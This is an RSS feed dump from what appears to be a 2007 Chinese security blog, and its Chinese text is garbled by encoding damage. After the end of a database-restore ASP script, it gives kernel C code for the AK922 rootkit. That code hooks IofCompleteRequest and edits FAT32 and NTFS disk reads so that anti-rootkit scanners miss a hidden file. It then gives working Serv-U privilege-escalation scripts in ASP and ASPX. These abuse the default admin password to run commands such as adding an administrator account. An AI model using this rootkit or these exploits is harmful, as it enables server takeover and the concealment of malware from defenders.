'鎭㈠鏃惰鍦ㄦ病鏈変嬌鐢ㄦ暟鎹簱鏃惰繘琛岋紒
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv
Response.write "<font color=green>鎭㈠鎴愬姛!</font>"
else
Response.write "<font color=red>璇烽夋嫨澶囦喚鎴栨仮澶?</font>"
end if
end if
end if
%></td>
</tr>
</table>
</body>
</html>

 



鍙跺瓙 2007-10-22 09:41 鍙戣〃璇勮
]]>AK922: 紿佺牬紓佺洏浣庣駭媯嫻嬪疄鐜版枃浠墮殣钘?/title><link>http://www.shnenglu.com/elva/archive/2007/10/12/34018.html</link><dc:creator>鍙跺瓙</dc:creator><author>鍙跺瓙</author><pubDate>Fri, 12 Oct 2007 03:58:00 GMT</pubDate><guid>http://www.shnenglu.com/elva/archive/2007/10/12/34018.html</guid><wfw:comment>http://www.shnenglu.com/elva/comments/34018.html</wfw:comment><comments>http://www.shnenglu.com/elva/archive/2007/10/12/34018.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/elva/comments/commentRss/34018.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/elva/services/trackbacks/34018.html</trackback:ping><description><![CDATA[AK922: 紿佺牬紓佺洏浣庣駭媯嫻嬪疄鐜版枃浠墮殣钘?br>浣滆咃細Azy<br>email: Azy000@gmail.com<br>瀹屾垚浜庯細2007-08-08<br><br>   鐩墠錛屼竴浜涘凡鍏紑鐨勪富嫻乤nti-rootkit媯嫻嬮殣钘忔枃浠朵富瑕佹湁涓ょ鏂規硶錛氱涓縐嶆槸鏂囦歡緋葷粺灞傜殑媯嫻嬶紝灞炰簬榪欎竴綾葷殑鏈塱cesword錛宒arkspy錛実mer絳夈傜浜岀渚挎槸紓佺洏綰у埆鐨勪綆綰ф嫻嬶紙Disk Low-Level Scanning錛夛紝灞炰簬榪欎竴綾葷殑ark涔熷緢澶氾紝鍏稿瀷浠h〃涓簉ootkit unhooker錛宖ilereg錛坕s鐨勬彃浠訛級錛宺ootkit revealer錛宐lacklight絳夈傚綋鐒訛紝榪樻湁涓浜涘伐鍏鳳紝瀹冧滑鍦ㄥ簲鐢ㄥ眰涓婇氳繃璋冪敤ZwQueryDirectoryFile鏉ュ疄鏂芥嫻嬨?br>   椹卞姩涔熷ソ錛屽簲鐢ㄤ篃緗紝璇寸櫧浜嗗氨鏄洿鎺ユ垨闂存帴鍙戦両RP鍒頒笅灞傞┍鍔ㄣ傜涓綾葷殑鍙戦佸埌FSD涓紙fastfat.sys/ntfs.sys錛夛紝絎簩綾昏鍙戦佸埌紓佺洏椹卞姩錛坉isk.sys錛夛紝鑰屽悗IRP渚夸細鎼哄甫鐩稿簲鐨勬枃浠朵俊鎭繑鍥烇紝榪欐椂涓婂眰搴旂敤鍐嶆牴鎹繑鍥炰俊鎭繘琛屽鐞嗗拰鍒ゆ柇銆備絾鏄敱浜嶥isk綰ф瘮FS綰ф洿搴曞眰錛孖RP榪斿洖緇欐垜浠殑鏄洿鍔犳帴榪戞暟鎹師濮嬬粍緇囨柟寮忕殑紓佺洏鎵囧尯淇℃伅錛屾墍浠ュ湪Disk灞備笂瀹炴柦鏂囦歡媯嫻嬪彲浠ュ緱鍒版洿浠や漢淇℃湇鐨勭粨鏋溿備絾榪欏茍涓嶇瓑浜庤榪欑被媯嫻嬩笉鑳借鍑昏觸銆傛湰鏂囧氨灝嗕粙緇嶄竴縐嶇粫榪囪綾繪嫻嬬殑瀹炵幇鏂規硶錛屽綋鐒訛紝榪欎篃鏄湪AK922涓嬌鐢ㄧ殑銆?br>   瀵逛簬瑕佸疄鐜版枃浠墮殣钘忕殑RK錛屼笌鍏惰鏄?#8220;緇曡繃”錛岃繕涓嶅璇存槸“鎷︽埅” -- 鎸傞挬鏌愪簺鍐呮牳鍑芥暟璋冪敤錛屼互渚垮湪榪斿洖涓婂眰涔嬪墠鎴戜滑鏈夋満浼氳繃婊ゆ帀寰呴殣钘忔枃浠剁殑淇℃伅銆?br>   AK922閲囩敤鐨勬柟娉曟槸Hook鍐呮牳鍑芥暟IofCompleteRequest銆傝繖涓嚱鏁板緢鏈夋剰鎬濓紝鍥犱負瀹冧笉浠呮槸涓涓嚑涔庡湪浠諱綍椹卞姩涓兘瑕佽皟鐢ㄧ殑鍑芥暟錛岃屼笖鍙傛暟涓濂藉惈鏈塈RP銆傛湁浜咺RP錛屽氨鏈変簡涓鍒囥傝繖浜涚壒鎬у喅瀹氫簡瀹冨緢閫傚悎鍋氭垜浠殑“鍌鍎?#8221;銆備絾鏇撮噸瑕佺殑鏄紝涓鑸湪椹卞姩涓皟鐢↖ofCompleteRequest涔嬫椂IRP鎿嶄綔閮藉凡瀹屾瘯錛孖RP涓浉鍏沖煙宸茬粡濉厖浜嗗唴瀹癸紝榪欏氨渚夸簬鎴戜滑鐫鎵嬬洿鎺ヨ繘琛岃繃婊よ屼笉鐢ㄥ啀鍋氳濡傚彂閫両RP瀹夎瀹屾垚渚嬬▼涔嬬被鐨勬搷浣溿?br>   涓嬮潰灝辯潃閲嶈涓涓嬪伐浣滄祦紼嬶細<br>   棣栧厛錛屽垽鏂璏ajorFunction鏄笉鏄疘RP_MJ_READ浠ュ強IO鍫嗘爤涓殑DeviceObject鏄惁鏄鐩橀┍鍔ㄧ殑璁懼瀵硅薄錛屽洜涓鴻繖鎵嶆槸鎴戜滑瑕佸鐞嗙殑鏍稿績IRP錛屾墍鏈塧rk鐩存帴鍙戦佸埌Disk灞傜殑IRP鍦ㄨ繖閲岄兘鍙互琚嫤鎴埌銆?br>   鎺ヤ笅鏉ョ殑澶勭悊瑕佺壒鍒敞鎰忥紝榪涘叆鍒拌繖閲屾椂IRQL鏄湪APC_LEVEL浠ヤ笂鐨勶紝鍥犳鎴戜滑涓嶈兘紕頒換浣旾RP涓殑鐢ㄦ埛妯″紡緙撳啿鍖猴紝涓紕版瀬鏈夊彲鑳借摑錛屼篃灝辨槸璇存垜浠笉鑳界洿鎺ュ鐞嗙浉鍏崇鐩樻墖鍖轟俊鎭紝鑰屽繀欏婚氳繃ExQueueWorkItem鎺掗槦涓涓猈orkItem鐨勬柟娉曟潵澶勭悊銆傞櫎姝や箣澶栵紝鐢變簬Disk灞傚湪璁懼鍫嗘爤涓浜庨潬涓嬬殑浣嶇疆錛屽ぇ閮ㄥ垎IRP鍙戝埌榪欓噷鏃跺綋鍓嶈繘紼嬩笂涓嬫枃鏃╁凡涓嶆槸鍘熷IRP鍙戣搗鑰呯殑榪涚▼涓婁笅鏂囦簡錛岃繖閲岀殑鍙戣搗鑰呭簲鐞嗚В涓篴rk榪涚▼銆傚垢榪愮殑鏄湪IRP鐨凾ail.Overlay.Thread鍩熶腑榪樹繚瀛樼潃鍘熷ETHREAD鎸囬拡錛屼負浜嗘搷浣滅敤鎴鋒ā寮忕紦鍐插尯錛屽繀欏昏皟鐢↘eAttachProcess鍒囧埌IRP鍙戣搗鑰呯殑涓婁笅鏂囩幆澧冧腑錛岃岃繖涓伐浣滃彧鑳藉湪澶勪簬PASSIVE_LEVEL綰т笂鐨勫伐浣滆呯嚎紼嬩腑鎵ц銆傚湪DISPATCH_LEVEL綰т笂錛屽仛鐨勪簨瓚婂皯瓚婂ソ銆?br>   鍒氬紑濮嬫垜榪樺垎涓ょ鎯呭喌榪涜澶勭悊錛氬洜涓哄茍涓嶆槸鎵鏈夌殑IRP閮戒笉澶勫湪鍘熷涓婁笅鏂囦腑錛屾瘮濡俰cesword鍙戠殑IRP鍒拌繖閲岃繕鏄鍦╥cesword.exe榪涚▼涓殑錛岃繖鏃舵垜璁や負鍙互涓嶇敤鎺掗槦宸ヤ綔欏癸紝榪欐牱灝卞彲浠ヨ妭鐪佸緢澶氱郴緇熻祫婧愶紝鎻愰珮榪囨護鏁堢巼銆備簬鏄垜璇曞浘鍦―ISPATCH_LEVEL綰т笂鐩存帴鎿嶄綔鐢ㄦ埛緙撳啿鍖猴紝浣嗚繖鏍規湰琛屼笉閫氥傞┍鍔ㄥ緢涓嶇ǔ瀹氾紝涓嶄竴浼氬氨钃濅簡銆傛晠绱㈡ц佽佸疄瀹炲湴鎺掗槦鍘諱簡錛岀劧鍚庡啀鍒嗘儏鍐靛鐞嗐備唬鐮佸涓嬶細<br><br>// 澶勭悊Disk Low-Level Scanning<br>if(irpSp->MajorFunction == IRP_MJ_READ && IsDiskDrxDevice(irpSp->DeviceObject) && irpSp->Parameters.Read.Length != 0)<br>{    <br>        <br>    orgnThread = Irp->Tail.Overlay.Thread;<br>    orgnProcess = IoThreadToProcess(orgnThread);<br>        <br>    if(Irp->MdlAddress)<br>    {        <br>        UserBuffer = (PVOID)((ULONG)Irp->MdlAddress->StartVa + Irp->MdlAddress->ByteOffset);<br>            <br>        // UserBuffer蹇呴』鏈夋晥<br>        if(UserBuffer)<br>        {                    <br>            <br>            if(KeGetCurrentIrql() == DISPATCH_LEVEL)<br>            {                    <br>            <br>                RtlZeroMemory(WorkerCtx, sizeof(WORKERCTX));<br>                <br>                WorkerCtx->UserBuffer = UserBuffer;<br>                WorkerCtx->Length = irpSp->Parameters.Read.Length;<br>                WorkerCtx->EProc = orgnProcess;<br>                <br>                ExInitializeWorkItem(&WorkerCtx->WorkItem, WorkerThread, WorkerCtx);<br>                                <br>                ExQueueWorkItem(&WorkerCtx->WorkItem, CriticalWorkQueue);<br>            } <br>        }<br>        <br>    }<br>}<br>  <br><br>   鏉ュ埌宸ヤ綔鑰呯嚎紼嬶紝鍒頒簡PASSIVE_LEVEL綰т笂錛屽垏鎹笂涓嬫枃涔嬪悗錛屼技涔庡畨鍏ㄥ浜嗐備絾鏄互闃蹭竾涓錛屾搷浣滅敤鎴鋒ā寮忕紦鍐插尯涔嬪墠榪樻槸瑕佽皟鐢≒robeForXxx鍑芥暟鍏堝垽鏂竴涓嬨傜浉鍏充唬鐮佸涓嬶細<br><br>VOID WorkerThread(PVOID Context)<br>{<br>    KIRQL irql;<br>    PEPROCESS eproc = ((PWORKERCTX)Context)->orgnEProc;<br>    PEPROCESS currProc = ((PWORKERCTX)Context)->currEProc;<br>    //PMDL mdl;<br>        <br><br>    if(((PWORKERCTX)Context)->UserBuffer)<br>    {<br>        if(eproc != currProc)<br>        {<br><br>            KeAttachProcess(eproc);<br><br>            __try{<br>            <br>                // ProbeForWrite must be running <= APC_LEVEL<br>                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);<br>                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);<br>            }<br><br>            __except(EXCEPTION_EXECUTE_HANDLER){<br><br>                //DbgPrint("we can't op the buffer now :-(");<br>                KeDetachProcess();    <br>                return;<br>            }<br>            <br>            KeDetachProcess();    <br>            <br>        }else{<br><br>            __try{<br>            <br>                // ProbeForWrite must be running <= APC_LEVEL<br>                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);<br>                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);<br>            }<br><br>            __except(EXCEPTION_EXECUTE_HANDLER){}<br>        }<br>    <br>    }<br>}<br><br>   鍑嗗宸ヤ綔緇堜簬綆楁槸鍋氬緱宸笉澶氫簡錛屼笅闈㈠氨寮濮嬬湡姝f秱鏀圭鐩樻墖鍖哄唴瀹逛簡銆傝繖閲屽皢娑夊強鍒癋AT32鍜孨TFS紓佺洏鏂囦歡緇撴瀯錛屾垜鍏堟妸瑕佺敤鍒扮殑涓昏緇撴瀯鍒楀嚭鏉ワ紝鍏朵綑鐨勫ぇ瀹跺彲浠ュ弬鑰冦奛TFS Documentation銆嬨?br><br>typedef struct _INDEX_HEADER{<br>    UCHAR            magic[4];<br>    USHORT            UpdateSequenceOffset;<br>    USHORT            SizeInWords;<br>    LARGE_INTEGER    LogFileSeqNumber;<br>    LARGE_INTEGER    VCN;<br>    ULONG            IndexEntryOffset;    // needed!<br>    ULONG            IndexEntrySize;<br>    ULONG            AllocateSize;<br>}INDEX_HEADER, *PINDEX_HEADER;<br><br><br>typedef struct _INDEX_ENTRY{<br>    LARGE_INTEGER        MFTReference;<br>    USHORT            Size;                // needed!<br>    USHORT            FileNameOffset;<br>    USHORT            Flags;<br>    USHORT            Padding;<br>    LARGE_INTEGER        MFTReferParent;<br>    LARGE_INTEGER        CreationTime;<br>    LARGE_INTEGER        ModifyTime;<br>    LARGE_INTEGER        FileRecModifyTime;<br>    LARGE_INTEGER        AccessTime;<br>    LARGE_INTEGER        AllocateSize;<br>    LARGE_INTEGER        RealSize;<br>    LARGE_INTEGER        FileFlags;<br>    UCHAR            FileNameLength;<br>    UCHAR            NameSpace;<br>    WCHAR            FileName[1];<br>}INDEX_ENTRY, *PINDEX_ENTRY;<br><br>   鍦ㄨ鍙栫鐩樻枃浠朵俊鎭椂姣忔閮芥槸浠ヤ竴涓墖鍖哄ぇ灝忥紙512 bytes錛夌殑鏁存暟鍊嶈繘琛岀殑錛屽鏋滀笉浜嗚В鐩稿簲鍗風殑緇勭粐褰㈠紡鍜屾暟鎹粨鏋勶紝閭d箞鎰熻灝辨槸鏁版嵁澶氳岀箒鏉傦紝鎼滅儲鏁堢巼涔熷緢浣庛備絾杈呬互涓婅堪緇撴瀯渚垮彲蹇熷畾浣嶅緟闅愯棌鏂囦歡騫惰繘琛屾秱鏀廣傝繖閲屼笉寰椾笉璇翠竴鍙ワ紝綆楁硶鐨勯珮鏁堟槸寰堥噸瑕佺殑錛屽鏋滈噰鐢ㄦ毚鍔涙悳绱㈢殑鏂瑰紡錛岄偅涔堢郴緇烞SOD鐨勬鐜囦細澶уぇ澧炲姞銆?br>   鍦‵AT32鍗蜂笂錛屽綋AK922鎼滅儲鍒版枃浠禔K922.sys鐨勭洰褰曢」鏃訛紝灝嗗叾0x0鍋忕Щ澶勭殑鏂囦歡鍚嶇殑絎竴涓瓧鑺傜疆涓?0xe5"錛屽嵆鏍囪涓哄垹闄ゃ傝繖鏍峰嵆鍙揪鍒版楠梐rk鐨勭洰鐨勩備絾涓轟簡鏇村姞闅愯斀錛屼笉璁﹚inhex瀵熻鍑烘潵錛屾渶濂芥妸鏂囦歡鍚嶅叏閮ㄦ竻0銆?br>   澶勭悊NTFS鍗風◢寰夯鐑︿簺錛屾枃浠惰褰曞拰绱㈠紩欏歸兘瑕佹姽騫插噣錛屽叿浣撳疄鐜拌浠g爜錛岃繖閲屼笉鍐嶈禈榪般?br><br>VOID HandleAkDiskHide(PVOID UserBuf, ULONG BufLen)<br>{<br>    ULONG i;<br>    BOOLEAN bIsNtfsIndex;<br>    BOOLEAN bIsNtfsFile;<br>    ULONG offset = 0;<br>    ULONG indexSize = 0;<br>    PINDEX_ENTRY currIndxEntry = NULL;<br>    PINDEX_ENTRY preIndxEntry = NULL;<br>    ULONG currPosition;<br><br>    <br>    bIsNtfsFile = (_strnicmp(UserBuf, NtfsFileRecordHeader, 4) == 0);<br>    bIsNtfsIndex = (_strnicmp(UserBuf, NtfsIndexRootHeader, 4) == 0);<br><br>    if(bIsNtfsFile == FALSE && bIsNtfsIndex == FALSE)<br>    {            <br>    <br>        for(i = 0; i < BufLen/0x20; i++)<br>        {<br>            if(!_strnicmp(UserBuf, fileHide, 5) && !_strnicmp((PVOID)((ULONG)UserBuf+0x8), fileExt, 3))<br>            {<br><br>                *(PUCHAR)UserBuf        = 0xe5;<br>                *(PULONG)((ULONG)UserBuf + 0x1)    = 0;<br><br>                break;<br>                    <br>            }<br><br>            UserBuf = (PVOID)((ULONG)UserBuf + 0x20);<br>        <br>        }<br><br>    } else if(bIsNtfsFile) {<br><br>        //DbgPrint("FILE0...");<br><br>        for(i = 0; i < BufLen / FILERECORDSIZE; i++)<br>        {<br>            if(!_wcsnicmp((PWCHAR)((ULONG)UserBuf + 0xf2), hideFile, 9))<br>            {<br>                memset((PVOID)UserBuf, 0, 0x4);<br>                memset((PVOID)((ULONG)UserBuf + 0xf2), 0, 18);<br>                break;<br>            }<br>                <br>            UserBuf = (PVOID)((ULONG)UserBuf + FILERECORDSIZE);<br>                <br>        }<br>            <br>    } else if(bIsNtfsIndex) {<br>                            <br>        //DbgPrint("INDX...");<br>        // Index Entries<br>        <br>        offset = ((PINDEX_HEADER)UserBuf)->IndexEntryOffset + 0x18;<br>        indexSize = BufLen - offset;<br>        currPosition = 0;<br><br>        currIndxEntry = (PINDEX_ENTRY)((ULONG)UserBuf + offset);<br>        //DbgPrint(" -- offset: 0x%x indexSize: 0x%x", offset, indexSize);<br>                <br>        while(currPosition < indexSize && currIndxEntry->Size > 0 && currIndxEntry->FileNameOffset > 0)<br>        {<br>            if(!_wcsnicmp(currIndxEntry->FileName, hideFile, 9))<br>            {<br>                memset((PVOID)currIndxEntry->FileName, 0, 18);<br><br>                if(currPosition == 0)<br>                {<br>                    ((PINDEX_HEADER)UserBuf)->IndexEntryOffset += currIndxEntry->Size;<br>                    break;<br>                }<br><br>                preIndxEntry->Size += currIndxEntry->Size;<br>                <br>                break;<br>            }<br><br>            currPosition += currIndxEntry->Size;<br>            preIndxEntry = currIndxEntry;<br>            currIndxEntry = (PINDEX_ENTRY)((ULONG)currIndxEntry + currIndxEntry->Size);<br>                    <br>        }<br>    }<br>}<br><br>   姘村鉤鏈夐檺錛屾榪庡ぇ瀹朵笌鎴戜氦嫻併?br><br><br>鍙傝冭祫鏂欙細<br><br>[1] - 銆奛TFS Documentation銆?br>[2] - Azy錛屻奍ceSword & Rootkit Unhooker椹卞姩綆鏋愩?br><br>---------<br><br>鍏充簬AK922(AzyKit)錛氭垜鍐欑殑涓涓彧瀹炵幇鏂囦歡闅愯棌鐨凴K錛屽彲浠ypass鏈枃鎻愬埌鐨勬墍鏈塧rk銆?br>Download @ <a target=_blank><u><font color=#0000ff>http://www.wiiupload.net/sf/65b4e75ec4</font></u></a> <img src ="http://www.shnenglu.com/elva/aggbug/34018.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/elva/" target="_blank">鍙跺瓙</a> 2007-10-12 11:58 <a href="http://www.shnenglu.com/elva/archive/2007/10/12/34018.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>鍒嗕韓serv-u鍒╃敤鑴氭湰(asp/aspx/php/perl)http://www.shnenglu.com/elva/archive/2007/08/04/29350.html鍙跺瓙鍙跺瓙Sat, 04 Aug 2007 07:17:00 GMThttp://www.shnenglu.com/elva/archive/2007/08/04/29350.htmlhttp://www.shnenglu.com/elva/comments/29350.htmlhttp://www.shnenglu.com/elva/archive/2007/08/04/29350.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/29350.htmlhttp://www.shnenglu.com/elva/services/trackbacks/29350.htmlASP


<%
'Serv-U asp 鎻愭潈紼嬪簭
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if  not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case action
case 1
    set a=Server.CreateObject("Microsoft.XMLHTTP")
    a.open "GET", "    a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
    set session("a")=a
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>姝e湪榪炴帴 127.0.0.1:<%=port%>,浣跨敤鐢ㄦ埛鍚? <%=user%>,鍙d護錛?lt;%=pass%>...<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 2
    set b=Server.CreateObject("Microsoft.XMLHTTP")
    b.open "GET", "    b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
   set session("b")=b
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>姝e湪鎻愬崌鏉冮檺,璇風瓑寰?..,<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 3
    set c=Server.CreateObject("Microsoft.XMLHTTP")
    c.open "GET", "    c.send loginuser & loginpass & mt & deldomain & quit
    set session("c")=c
%>
<center>鎻愭潈瀹屾瘯,宸叉墽琛屼簡鍛戒護錛?lt;br><font color=red><%=cmd%></font><br><br>
<input type=button value=" 榪斿洖緇х畫 " onClick="location.href='<%=gname()%>';">
</center>
<%
case else
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
%>
<center><form method="post" name="goldsun">
<table width="494" height="163" border="1" cellpadding="0" cellspacing="1" bordercolor="#666666">
  <tr align="center" valign="middle">
    <td colspan="2">Serv-U 鎻愬崌鏉冮檺 ASP鐗?Goldsun[at]84823714</td>
  </tr>
  <tr align="center" valign="middle">
    <td width="100">鐢ㄦ埛鍚?</td>
    <td width="379"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>鍙c浠わ細</td>
    <td><input name="p" type="text" id="p" value=" #l@$ak#.lk;0@P"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>绔鍙o細</td>
    <td><input name="port" type="text" id="port" value="43958"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>緋葷粺璺緞錛?lt;/td>
    <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>鍛姐浠わ細</td>
    <td><input name="c" type="text" id="c" value="cmd /c net user goldsun love /add & net localgroup administrators goldsun /add" size="50"></td>
  </tr>
 
  <tr align="center" valign="middle">
    <td colspan="2"><input type="submit" name="Submit" value="鎻愪氦">銆
      <input type="reset" name="Submit2" value="閲嶇疆">
      <input name="action" type="hidden" id="action" value="1"></td>
  </tr>
</table></form></center>
<% end select
function Gpath()
on error resume next
    err.clear
    set f=Server.CreateObject("Scripting.FileSystemObject")
    if err.number>0 then
 gpath="c:"
        exit function
    end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>


ASPX


<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

'
' Love, where are you ?

Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text

Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
Dim DelDomain As String = "-deleteDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf

'Dim client As New TcpClient
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
Dim tcpClient2 As New TcpClient()
Try
tcpClient2.Connect("127.0.0.1", 43859)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, "User lake" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "pass admin123" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "site exec " & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub


Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

</script>
<html>
<head>
</head>
<body>
<form runat="server">
<p>
<asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
admin by lake2</asp:Label>
</p>
<p>
<asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
<asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
<br />
<asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
<asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
